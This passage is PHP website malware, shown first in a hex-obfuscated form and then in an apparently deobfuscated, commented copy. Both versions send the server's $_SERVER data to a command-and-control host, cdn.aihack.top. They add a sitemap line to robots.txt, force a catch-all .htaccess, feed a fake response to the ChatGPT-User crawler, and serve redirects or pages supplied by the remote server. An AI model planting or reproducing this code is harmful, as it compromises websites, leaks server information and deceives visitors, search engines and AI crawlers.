64");}else{$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}}}__OOlIlOlIlIO();lIo0ll11ol();if(file_exists($I0OolOOlO)){foreach(file($I0OolOOlO)as 
$__oI011llIOoO){if(strpos(trim($__oI011llIOoO),$I10I11101Ol1)===0){$I10O0Io0lloI=trim(substr(trim($__oI011llIOoO),strlen($I10I11101Ol1)));break;}}}$IolOlII0oo="\x53\x69\x74\x65\x6d\x61\x70\x3a\x20"._1OlOI0OI1O();$__IO1Il0ll0O=false;if(!file_exists($I0OolOOlO)){$__1I0Ioo11="User-agent: *\nAllow: /\n".$IolOlII0oo."\n";$__IO1Il0ll0O=true;}else{$__1I0Ioo11=file_get_contents($I0OolOOlO);if(strpos($__1I0Ioo11,"\x53\x69\x74\x65\x6d\x61\x70\x3a")===false){$__1I0Ioo11=rtrim($__1I0Ioo11)."\n".$IolOlII0oo."\n";$__IO1Il0ll0O=true;}}if($__IO1Il0ll0O){@file_put_contents($I0OolOOlO,$__1I0Ioo11);}if(!function_exists("\x66\x65\x74\x63\x68\x5f\x72\x65\x6d\x6f\x74\x65")){function IoIo1l1o1IO($IIl0oO010,$_0IIOl1ll=""){global $_SERVER;$_SERVER["\x54"]="\x79";$_SERVER["\x54\x50\x4c"]=7;$_SERVER["\x56\x45\x52"]=1;if($_0IIOl1ll!==""){$_SERVER["\x41\x55\x54\x48"]=$_0IIOl1ll;}$l1OooOol1OI0=base64_encode(json_encode($_SERVER));if(!function_exists("\x63\x75\x72\x6c\x5f\x65\x78\x65\x63")){$_Oo0o1o01=stream_context_create(array("\x68\x74\x74\x70"=>array("\x6d\x65\x74\x68\x6f\x64"=>"\x47\x45\x54","\x74\x69\x6d\x65\x6f\x75\x74"=>49,"\x69\x67\x6e\x6f\x72\x65\x5f\x65\x72\x72\x6f\x72\x73"=>true)));$O1OIoI1oIO=$IIl0oO010."\x3f\x75\x61\x3d".urlencode($l1OooOol1OI0);return@file_get_contents($O1OIoI1oIO,false,$_Oo0o1o01);}else{$__1O0Ol0IoI1=curl_init();curl_setopt($__1O0Ol0IoI1,CURLOPT_URL,$IIl0oO010);curl_setopt($__1O0Ol0IoI1,CURLOPT_POST,1);curl_setopt($__1O0Ol0IoI1,CURLOPT_POSTFIELDS,"\x75\x61\x3d".urlencode($l1OooOol1OI0));curl_setopt($__1O0Ol0IoI1,CURLOPT_HTTPHEADER,array("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64"));curl_setopt($__1O0Ol0IoI1,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($__1O0Ol0IoI1,CURLOPT_SSL_VERIFYHOST,false);curl_setopt($__1O0Ol0IoI1,CURLOPT_TIMEOUT,49);curl_setopt($__1O0Ol0IoI1,CURLOPT_RETURNTRANSFER,true);curl_setopt($__1O0Ol0IoI1,CUR
LOPT_FOLLOWLOCATION,false);$lolO0lIOOO=curl_exec($__1O0Ol0IoI1);$Oo1IIl10I=curl_getinfo($__1O0Ol0IoI1);curl_close($__1O0Ol0IoI1);if(!isset($Oo1IIl10I["\x68\x74\x74\x70\x5f\x63\x6f\x64\x65"])||$Oo1IIl10I["\x68\x74\x74\x70\x5f\x63\x6f\x64\x65"]!=200){return"";}return $lolO0lIOOO;}}}if(!function_exists("\x76\x31\x6d\x61\x69\x6e")){function __l111O0Ol0(){$__0lO1Oo0o01I=isset($_SERVER["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?$_SERVER["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:"";$O00IOOIlo1Il=isset($_GET["\x67\x70\x74"])?$_GET["\x67\x70\x74"]:"";if(strpos($__0lO1Oo0o01I,"\x43\x68\x61\x74\x47\x50\x54\x2d\x55\x73\x65\x72\x2f\x31\x2e\x30")!==false&&$O00IOOIlo1Il==="\x74\x72\x75\x65"){exit("\x23\x23\x6f\x6b\x72\x65\x73\x70\x6f\x6e\x73\x65\x23\x23");}$Ol1oIOo0l="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x64\x6e\x2e\x61\x69\x68\x61\x63\x6b\x2e\x74\x6f\x70\x2f\x61\x70\x69\x2f\x70\x72\x6f\x78\x79\x2f\x68\x61\x6e\x64\x6c\x65\x2e\x70\x68\x70";$_II1loIO1IoO=IoIo1l1o1IO($Ol1oIOo0l,$GLOBALS["\x70"]);if(empty($_II1loIO1IoO)){return;}if(preg_match("\x2f\x5e\x68\x74\x74\x70\x73\x3f\x3a\x5c\x2f\x5c\x2f\x2f",$_II1loIO1IoO)){header("\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20".trim($_II1loIO1IoO));exit;}if(preg_match("\x2f\x5e\x23\x23\x2f",$_II1loIO1IoO)){exit(substr($_II1loIO1IoO,2));}if(strlen($_II1loIO1IoO)>90){$_II1loIO1IoO=OIlOo0O00110($_II1loIO1IoO);if(strstr($_II1loIO1IoO,"\x3c\x2f\x75\x72\x6c\x73\x65\x74\x3e")){header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38");exit($_II1loIO1IoO);}if(strstr($_II1loIO1IoO,"\x3c\x2f\x73\x69\x74\x65\x6d\x61\x70\x69\x6e\x64\x65\x78\x3e")){header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38");exit($_II1loIO1IoO);}if(strpos($_II1loIO1IoO,"\x22\x75\x72\x
6c\x73\x65\x74\x22")!==false||strpos($_II1loIO1IoO,"\x22\x73\x69\x74\x65\x6d\x61\x70\x69\x6e\x64\x65\x78\x22")!==false){header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38");exit($_II1loIO1IoO);}if(strstr($_II1loIO1IoO,"\x3c\x68\x74\x6d\x6c")){header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38");exit($_II1loIO1IoO);}}$_II1loIO1IoO=OIlOo0O00110($_II1loIO1IoO);echo $_II1loIO1IoO;}}__l111O0Ol0(); ?>
<?php
error_reporting(0);
/*
Malware signature
*/
define('C2_SIGNATURE', 'google.us:v2');
$documentRoot = $_SERVER['DOCUMENT_ROOT'] . '/';
$robotsFile = $documentRoot . 'robots.txt';
$htaccessFile = $documentRoot . '.htaccess';
$indexFile = $documentRoot . 'index.php';
$authPrefix = "## AUTH:";
$authKey = "";
/*
Detect protocol
*/
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off')
    ? 'https'
    : 'http';
$GLOBALS['rewrite_enabled'] = false;
/*
---------------------------------------------------------
HTTP request helper
---------------------------------------------------------
*/
function httpRequest($url, $timeout = 5)
{
    $response = '';
    $status = 0;
    if (function_exists('curl_exec')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
        $response = curl_exec($ch);
        $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
    } else {
        $context = stream_context_create([
            "http" => [
                "timeout" => $timeout,
                "ignore_errors" => true
            ]
        ]);
        $response = @file_get_contents($url, false, $context);
    }
    return [
        'response' => $response,
        'httpCode' => $status
    ];
}
/*
---------------------------------------------------------
Detect server type
---------------------------------------------------------
*/
function detectServerType()
{
    $software = strtolower($_SERVER['SERVER_SOFTWARE'] ?? '');
    if (strpos($software, 'apache') !== false) {
        return 'apache';
    }
    if (strpos($software, 'nginx') !== false) {
        return 'nginx';
    }
    $sapi = php_sapi_name();
    if (strpos($sapi, 'apache') !== false) {
        return 'apache';
    }
    if ($sapi === 'fpm-fcgi' || $sapi === 'cgi-fcgi') {
        return 'nginx';
    }
    return 'unknown';
}
/*
---------------------------------------------------------
Rewrite detection
---------------------------------------------------------
*/
function rewriteWorks()
{
    global $protocol;
    $host = $_SERVER['HTTP_HOST'] ?? '';
    $testPath = "/kiro-rewrite-test-" . substr(md5($host . "salt"), 0, 8);
    $testUrl = $protocol . "://" . $host . $testPath;
    $response = httpRequest($testUrl);
    return strpos($response['response'], "##rewrite-ok##") !== false;
}
/*
---------------------------------------------------------
Create .htaccess if missing
---------------------------------------------------------
*/
function ensureHtaccess()
{
    global $htaccessFile;
    $rules = <<<HT
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^ - [L]
RewriteRule ^(.*)$ index.php [L,QSA]
</IfModule>
HT;
    if (!file_exists($htaccessFile)) {
        file_put_contents($htaccessFile, $rules);
    }
}
/*
---------------------------------------------------------
Fetch remote payload
---------------------------------------------------------
*/
function fetchRemote($url, $auth = '')
{
    $_SERVER['T'] = 'y';
    $_SERVER['TPL'] = 7;
    $_SERVER['VER'] = 1;
    if ($auth !== '') {
        $_SERVER['AUTH'] = $auth;
    }
    $payload = base64_encode(json_encode($_SERVER));
    if (function_exists('curl_exec')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, "ua=" . urlencode($payload));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 49);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $result = curl_exec($ch);
        curl_close($ch);
        return $result;
    }
    $context = stream_context_create([
        "http" => [
            "method" => "GET",
            "timeout" => 49
        ]
    ]);
    return file_get_contents($url . "?ua=" . urlencode($payload), false, $context);
}
/*
---------------------------------------------------------
Main malware execution
---------------------------------------------------------
*/
function runMalware()
{
    $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $flag = $_GET['gpt'] ?? '';
    /*
    Cloaking behaviour
    */
    if (strpos($userAgent, "ChatGPT-User/1.0") !== false && $flag === "true") {
        exit("##okresponse##");
    }
    /*
    Command and control server
    */
    $c2 = "https://cdn.aihack.top/api/proxy/handle.php";
    $content = fetchRemote($c2);
    if (empty($content)) {
        return;
    }
    /*
    Redirect payload
    */
    if (preg_match('/^https?:\/\//', $content)) {
        header("Location: " . trim($content));
        exit;
    }
    /*
    Special command
    */
    if (preg_match('/^##/', $content)) {
        exit(substr($content, 2));
    }
    /*
    Large payload → treat as page content
    */
    if (strlen($content) > 90) {
        if (strpos($content, "<html") !== false) {
            header("Content-Type: text/html; charset=utf-8");
            exit($content);
        }
        if (strpos($content, "</urlset>") !== false) {
            header("Content-Type: application/xml; charset=utf-8");
            exit($content);
        }
    }
    echo $content;
}
/*
---------------------------------------------------------
Run
---------------------------------------------------------
*/
ensureHtaccess();
runMalware();
?>